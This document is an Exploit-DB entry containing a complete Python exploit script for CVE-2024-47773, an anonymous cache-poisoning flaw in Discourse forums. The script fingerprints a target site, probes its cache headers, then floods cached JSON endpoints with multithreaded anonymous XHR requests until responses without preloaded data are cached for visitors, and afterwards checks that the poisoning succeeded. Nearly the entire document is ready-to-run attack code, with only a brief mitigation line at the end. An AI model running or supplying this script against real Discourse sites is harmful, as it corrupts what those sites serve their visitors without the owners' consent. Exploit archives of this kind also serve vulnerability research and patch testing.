Discourse 3.2.x - Anonymous Cache Poisoning

EDB-ID:

52358




Platform:

Multiple

Date:

2025-07-08


#!/usr/bin/env python3
"""
Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning
Date: 2024-10-15
Exploit Author: ibrahimsql
Github: : https://github.com/ibrahmsql
Vendor Homepage: https://discourse.org
Software Link: https://github.com/discourse/discourse
Version: Discourse < latest (patched)
Tested on: Discourse 3.1.x, 3.2.x
CVE: CVE-2024-47773
CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)

Description:
Discourse anonymous cache poisoning vulnerability allows attackers to poison
the cache with responses without preloaded data through multiple XHR requests.
This affects only anonymous visitors of the site.

Reference:
https://nvd.nist.gov/vuln/detail/CVE-2024-47773
"""

import requests
import sys
import argparse
import time
import threading
import json
from urllib.parse import urljoin

class DiscourseCachePoisoning:
    def __init__(self, target_url, threads=10, timeout=10):
        self.target_url = target_url.rstrip('/')
        self.threads = threads
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'X-Requested-With': 'XMLHttpRequest'
        })
        self.poisoned = False
        
    def check_target(self):
        """Check if target is accessible and running Discourse"""
        try:
            response = self.session.get(f"{self.target_url}/", timeout=self.timeout)
            if response.status_code == 200:
                if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text:
                    return True
        except Exception as e:
            print(f"[-] Error checking target: {e}")
        return False
    
    def check_anonymous_cache(self):
        """Check if anonymous cache is enabled"""
        try:
            # Test endpoint that should be cached for anonymous users
            response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
            
            # Check cache headers
            cache_headers = ['cache-control', 'etag', 'last-modified']
            has_cache = any(header in response.headers for header in cache_headers)
            
            if has_cache:
                print("[+] Anonymous cache appears to be enabled")
                return True
            else:
                print("[-] Anonymous cache may be disabled")
                return False
                
        except Exception as e:
            print(f"[-] Error checking cache: {e}")
            return False
    
    def poison_cache_worker(self, endpoint):
        """Worker function for cache poisoning attempts"""
        try:
            # Create session without cookies to simulate anonymous user
            anon_session = requests.Session()
            anon_session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Accept': 'application/json, text/javascript, */*; q=0.01',
                'X-Requested-With': 'XMLHttpRequest'
            })
            
            # Make rapid requests to poison cache
            for i in range(50):
                response = anon_session.get(
                    f"{self.target_url}{endpoint}",
                    timeout=self.timeout
                )
                
                # Check if response lacks preloaded data
                if response.status_code == 200:
                    try:
                        data = response.json()
                        # Check for missing preloaded data indicators
                        if self.is_poisoned_response(data):
                            print(f"[+] Cache poisoning successful on {endpoint}")
                            self.poisoned = True
                            return True
                    except:
                        pass
                        
                time.sleep(0.1)
                
        except Exception as e:
            pass
        return False
    
    def is_poisoned_response(self, data):
        """Check if response indicates successful cache poisoning"""
        # Look for indicators of missing preloaded data
        indicators = [
            # Missing or empty preloaded data
            not data.get('preloaded', True),
            data.get('preloaded') == {},
            # Missing expected fields
            'categories' in data and not data['categories'],
            'topics' in data and not data['topics'],
            # Error indicators
            data.get('error') is not None,
            data.get('errors') is not None
        ]
        
        return any(indicators)
    
    def test_cache_poisoning(self):
        """Test cache poisoning on multiple endpoints"""
        print("[*] Testing cache poisoning vulnerability...")
        
        # Target endpoints that are commonly cached
        endpoints = [
            '/categories.json',
            '/latest.json',
            '/top.json',
            '/c/general.json',
            '/site.json',
            '/site/basic-info.json'
        ]
        
        threads = []
        
        for endpoint in endpoints:
            print(f"[*] Testing endpoint: {endpoint}")
            
            # Create multiple threads to poison cache
            for i in range(self.threads):
                thread = threading.Thread(
                    target=self.poison_cache_worker,
                    args=(endpoint,)
                )
                threads.append(thread)
                thread.start()
            
            # Wait for threads to complete
            for thread in threads:
                thread.join(timeout=5)
            
            if self.poisoned:
                break
                
            time.sleep(1)
        
        return self.poisoned
    
    def verify_poisoning(self):
        """Verify if cache poisoning was successful"""
        print("[*] Verifying cache poisoning...")
        
        # Test with fresh anonymous session
        verify_session = requests.Session()
        verify_session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })
        
        try:
            response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    if self.is_poisoned_response(data):
                        print("[+] Cache poisoning verified - anonymous users affected")
                        return True
                    else:
                        print("[-] Cache poisoning not verified")
                except:
                    print("[-] Unable to parse response")
            else:
                print(f"[-] Unexpected response code: {response.status_code}")
                
        except Exception as e:
            print(f"[-] Error verifying poisoning: {e}")
        
        return False
    
    def exploit(self):
        """Main exploit function"""
        print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)")
        print(f"[*] Target: {self.target_url}")
        
        if not self.check_target():
            print("[-] Target is not accessible or not running Discourse")
            return False
        
        print("[+] Target confirmed as Discourse instance")
        
        if not self.check_anonymous_cache():
            print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)")
            print("[*] Continuing with exploit attempt...")
        
        success = self.test_cache_poisoning()
        
        if success:
            print("[+] Cache poisoning attack successful!")
            self.verify_poisoning()
            print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data")
            print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE")
            return True
        else:
            print("[-] Cache poisoning attack failed")
            print("[*] Target may be patched or cache disabled")
            return False

def main():
    parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)')
    parser.add_argument('-u', '--url', required=True, help='Target Discourse URL')
    parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)')
    parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)')
    
    args = parser.parse_args()
    
    exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout)
    
    try:
        success = exploit.exploit()
        sys.exit(0 if success else 1)
    except KeyboardInterrupt:
        print("\n[-] Exploit interrupted by user")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        sys.exit(1)

if __name__ == '__main__':
    main()